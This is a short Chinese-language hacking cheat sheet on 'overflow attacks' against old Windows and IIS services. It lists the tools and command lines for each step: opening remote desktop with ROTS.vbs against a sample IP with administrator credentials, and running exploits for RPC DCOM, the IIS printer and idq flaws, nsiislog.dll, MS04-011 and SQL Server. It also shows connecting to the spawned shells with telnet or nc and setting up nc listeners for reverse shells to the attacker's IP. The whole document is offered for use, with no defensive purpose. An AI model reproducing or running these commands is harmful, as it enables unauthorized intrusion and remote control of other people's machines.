|
溢出攻击的使用
开3389用的方法:
cscript ROTS.vbs <目标IP> <用户名> <密码> [服务端口] [自动重起选项]
例子:cscript rots.vbs 218.16.50.147 "administrator" "mm" 3389 /r
溢出专题:
---->>>>rpc拒绝服务:
工具:
1.perl解释器
2.漏洞工具com.pl
3漏洞特征:端口开放为135
4.使用方法:
dcom.pl IP
---->>>>>printer漏洞:
工具:
1.X-scan
2.iis5hack
3.扫出后,用iis5hack溢出
4.方法:iis5hack IP Port sp类型(0或1)
溢出后用telnet IP 99
---->>>>>>RPC135溢出
工具:
1.rpcdcom.exe
2.webdavscan扫出系统版本
3.superscan扫135端口速度快的工具
4.rpcdcom.exe 版本 IP
----->>>>>idq漏洞溢出
工具:
1.snake IIS 溢出工具(IISMiscOverflowV2_Build0016)
2.X-Scan 扫出有null.idq漏洞的就行
3.用snake IIS 溢出后,直接telnet上去就行了
------>>>>>nsiislog.dll远程缓冲区溢出漏洞
工具:
1.media.exe和nc.exe
2.方法:输入:http:/IP/scripts/nsiislog.dll
有漏洞的一看就知
溢出格式:media.exe IP -p 80 -r /scripts/nsiislog.dll
溢出后打开nc -vv IP 34816
好了,接下来提升权限的我就不说了!
------>>>>>ms04011溢出
1.先用工具包里的扫描器有漏洞的机子
2.getos ip 得到版本windowsNT是4.0 2K的是5.0 XP的是5.1 2003的是6.0
3.打开nc -vv -l -p 1234
4.ms04011 版本号(0或1) 要进攻的IP 听的端口 自己的IP.
------>>>>>sql2.exe溢出
工具:
1.nc.exe和sql2.exe
2.打开nc -l -p 40
3.sql2.exe IP 40 0或1 |
|